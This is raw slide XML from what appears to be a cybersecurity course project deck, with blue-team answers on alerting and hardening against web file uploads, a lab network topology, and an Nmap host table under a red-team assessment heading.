            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-123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kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>An alarm that detects files being uploaded to the webserver should be sufficient to notify the team to look at the file</a:t>
            </a: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r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The threshold should be set to zero depending on the folder being accessed.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1347" name="Google Shape;1347;p92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857900" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Require authentication to upload files</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Store uploaded files in a location not accessible from the web</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Blacklisting file extensions</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Scramble uploaded file names and extensions</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Define valid types of files that the users should be allowed to upload.</a:t>
            </a:r>
            <a:endParaRPr sz="14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351"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>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95"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1853448"/>
            <a:ext cx="8595300" cy="792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Network Topology </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097" name="Google Shape;1097;p68"/>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3</a:t>
            </a:fld>
            <a:endParaRPr sz="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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6867850" y="910475"/>
            <a:ext cx="2002500" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Address Range 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: 192.168.1.1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sz="1100">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IPv4: 192.168.1.90</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KALI</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192.168.1.100</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ELK Server</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192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Server 1</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
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: ML-RefVm-684427</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1103" name="Google Shape;1103;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1104" name="Google Shape;1104;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1105" name="Google Shape;1105;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="6563052" cy="40091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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" sz="600"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="1029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b="1"/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>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71"/>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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;1119;p71"/>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marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p71"/>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21" name="Google Shape;1121;p71"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{4491A776-6A95-44DE-A382-5E3810DD701D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="403225">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Hostname</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IP Address</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Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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93475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>KALI</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192.168.1.90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ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK Server</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192.168.1.100</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ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Log Server</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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Server 1</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192.168.1.105</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ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Web Server</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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML-RefVm-684427</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ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</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solidFill>
                      <a:srgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Windows Hosting Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">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25"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p72"/>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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
